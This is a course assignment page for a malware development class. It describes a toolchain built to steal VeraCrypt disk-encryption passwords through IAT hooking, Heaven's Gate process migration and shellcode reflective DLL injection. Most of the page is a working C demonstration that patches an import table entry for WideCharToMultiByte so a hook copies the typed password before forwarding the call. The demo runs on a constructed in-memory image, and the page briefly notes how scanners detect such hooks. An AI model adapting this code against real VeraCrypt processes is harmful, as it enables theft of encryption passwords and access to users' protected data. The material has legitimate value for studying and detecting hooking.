This is the assignment part of the Malware Development Intermediate course by Sektor7. The course can be found here: MalDev Intermediate. The goal of the assignment is to steal the password a user types to mount an encrypted disk (volume) created with VeraCrypt, without using a keylogger: instead of capturing keystrokes, the password is taken from inside the VeraCrypt process as it passes through a Windows API call. To achieve this, the assignment consists of three parts:
- VCsniff: Use IAT hooking to capture the password from the `WideCharToMultiByte` API, i.e. patch the Import Address Table entry for that function in the VeraCrypt process so the call goes through a hook that reads the wide-character input before forwarding it to the real API
- VCmigrate: Migrate from the 32-bit process to a 64-bit process using Heaven's Gate (the switch from 32-bit to 64-bit code inside a WOW64 process, which lets the 32-bit code reach a 64-bit target)
- VCload: Inject into the 32-bit process and perform Shellcode Reflective DLL Injection (sRDI) to carry out the migration and the password stealing
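As an added illustration of the IAT-hooking step (example code written for this page, not code from the repository or the course): the function below walks the import directory of a PE32+ image, finds the `WideCharToMultiByte` slot imported from `KERNEL32.dll`, and replaces it with a hook that records the wide-character input before forwarding to the original. So that it runs without Windows, the image is a constructed in-memory stub laid out with the field offsets of winnt.h, and `fake_WideCharToMultiByte` stands in for the kernel32 export; `iat_hook`, `build_sample_image`, `demo_hook_captures` and the globals are names chosen here. In a real target the write needs `VirtualProtect()` to make the IAT page writable, only calls that go through that module's IAT are intercepted (calls resolved via `GetProcAddress` or made from other modules are not), and a 32-bit (PE32) image uses 4-byte thunks with the ordinal flag in bit 31.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Just enough PE32+ layout to reach the import directory (field offsets match winnt.h). */
#pragma pack(push, 1)
typedef struct { uint16_t e_magic; uint8_t pad[58]; uint32_t e_lfanew; } DosHeader;
typedef struct { uint32_t Signature; uint8_t file_hdr[20]; uint16_t Magic; uint8_t opt_rest[110];
                 struct { uint32_t VirtualAddress, Size; } DataDir[16]; } NtHeaders64;
typedef struct { uint32_t OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk; } ImportDescriptor;
#pragma pack(pop)
#define DIR_IMPORT 1
#define ORDINAL_FLAG64 (1ULL << 63)

static int ieq(const char *a, const char *b) {   /* case-insensitive: "KERNEL32.dll" vs "kernel32.dll" */
    while (*a && *b && tolower((unsigned char)*a) == tolower((unsigned char)*b)) a++, b++;
    return *a == *b;
}

/* Find the IAT slot for `func` imported from `dll` in the image mapped at `base`, overwrite it
 * with `hook`, and return the loader-resolved original (0 if not found).  In a live process the
 * IAT page is read-only, so VirtualProtect() has to precede the write. */
uint64_t iat_hook(uint8_t *base, const char *dll, const char *func, uint64_t hook) {
    const DosHeader *dos = (const DosHeader *)base;
    if (dos->e_magic != 0x5A4D) return 0;                                      /* "MZ" */
    const NtHeaders64 *nt = (const NtHeaders64 *)(base + dos->e_lfanew);
    if (nt->Signature != 0x00004550 || nt->Magic != 0x20B) return 0;           /* "PE\0\0", PE32+ */
    uint32_t imp = nt->DataDir[DIR_IMPORT].VirtualAddress;
    if (!imp) return 0;
    for (const ImportDescriptor *d = (const ImportDescriptor *)(base + imp); d->Name; d++) {
        if (!ieq((const char *)(base + d->Name), dll)) continue;
        /* ILT (names) and IAT (addresses) run in parallel; both are zero-terminated. */
        const uint64_t *ilt = (const uint64_t *)(base + d->OriginalFirstThunk);
        uint64_t *iat = (uint64_t *)(base + d->FirstThunk);
        for (; *ilt; ilt++, iat++) {
            if (*ilt & ORDINAL_FLAG64) continue;                               /* imported by ordinal */
            if (strcmp((const char *)(base + (uint32_t)*ilt + 2), func)) continue; /* +2 skips Hint */
            uint64_t orig = *iat; *iat = hook; return orig;
        }
    }
    return 0;
}

/* Stand-in for the kernel32 export (real argument order, plain C types): narrows UTF-16 code
 * units to bytes; cch == -1 means "up to the terminator", as in the real API. */
typedef int (*W2MB_t)(unsigned cp, unsigned long fl, const uint16_t *w, int cch, char *mb, int cb, const char *def, int *used);
static W2MB_t g_orig_W2MB;                 /* saved original, called by the hook */
char g_captured[64];                       /* the hook copies the wide-char input here */

static int fake_WideCharToMultiByte(unsigned cp, unsigned long fl, const uint16_t *w, int cch, char *mb, int cb, const char *def, int *used) {
    (void)cp; (void)fl; (void)def; (void)used;
    int n = 0;
    for (; (cch < 0 || n < cch) && n < cb && w[n]; n++) mb[n] = (char)w[n];
    return n;
}

/* The hook: record the wide-char input (the typed password, in the VCsniff scenario), then
 * forward to the original so the caller sees normal behaviour. */
static int hook_WideCharToMultiByte(unsigned cp, unsigned long fl, const uint16_t *w, int cch, char *mb, int cb, const char *def, int *used) {
    size_t i = 0;
    for (; i + 1 < sizeof g_captured && (cch < 0 || (int)i < cch) && w[i]; i++) g_captured[i] = (char)w[i];
    g_captured[i] = '\0';
    return g_orig_W2MB(cp, fl, w, cch, mb, cb, def, used);
}

/* Constructed minimal PE32+ image (not a real binary) importing GetTickCount and WideCharToMultiByte
 * from KERNEL32.dll, with the IAT already "resolved" the way the loader leaves it. */
void build_sample_image(uint8_t *img, size_t len) {
    memset(img, 0, len);
    DosHeader *dos = (DosHeader *)img;              dos->e_magic = 0x5A4D;      dos->e_lfanew = 0x40;
    NtHeaders64 *nt = (NtHeaders64 *)(img + 0x40);  nt->Signature = 0x00004550; nt->Magic = 0x20B;
    nt->DataDir[DIR_IMPORT].VirtualAddress = 0x200; nt->DataDir[DIR_IMPORT].Size = 40;
    ImportDescriptor *d = (ImportDescriptor *)(img + 0x200);  d->OriginalFirstThunk = 0x240; d->Name = 0x280; d->FirstThunk = 0x260;
    uint64_t *ilt = (uint64_t *)(img + 0x240), *iat = (uint64_t *)(img + 0x260); /* d[1] stays zero: terminator */
    ilt[0] = 0x2A0; ilt[1] = 0x2C0;                                /* RVAs of the Hint/Name entries */
    iat[0] = 0x7FF800001000ULL;                                    /* made-up address for GetTickCount */
    iat[1] = (uint64_t)(uintptr_t)fake_WideCharToMultiByte;        /* our stand-in export */
    memcpy(img + 0x280, "KERNEL32.dll", 13);
    memcpy(img + 0x2A2, "GetTickCount", 13);                       /* 2-byte Hint at 0x2A0 left as 0 */
    memcpy(img + 0x2C2, "WideCharToMultiByte", 20);
}

/* Install the hook, then call through the patched slot the way the hooked program would.
 * Returns 1 if the call still succeeded and the hook captured `expect`. */
int demo_hook_captures(const char *expect) {
    static _Alignas(8) uint8_t img[0x400];  build_sample_image(img, sizeof img); /* aligned image backing */
    uint64_t orig = iat_hook(img, "kernel32.dll", "WideCharToMultiByte", (uint64_t)(uintptr_t)hook_WideCharToMultiByte);
    if (!orig) return 0;  g_orig_W2MB = (W2MB_t)(uintptr_t)orig;
    W2MB_t via_iat = (W2MB_t)(uintptr_t)((uint64_t *)(img + 0x260))[1];   /* second IAT slot */
    uint16_t pw[] = { 'h', 'u', 'n', 't', 'e', 'r', '2', 0 };     /* constructed UTF-16 "password" */
    char out[16] = {0};
    int n = via_iat(65001, 0, pw, -1, out, (int)sizeof out, NULL, NULL);
    return n == 7 && strcmp(out, expect) == 0 && strcmp(g_captured, expect) == 0;
}
int main(void) {
    printf("%s, captured \"%s\"\n", demo_hook_captures("hunter2") ? "hooked" : "failed", g_captured);
    return 0;
}
```

The interesting part for detection is that nothing about the call site changes: the hooked program still issues its normal indirect call through the IAT, so the hook is only visible by comparing the IAT slot against the export address in the real `kernel32` mapping, which is how IAT-hook scanners work.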
A detailed blog post can be found here: geobour98 Blog.
This PoC was developed for educational purposes only!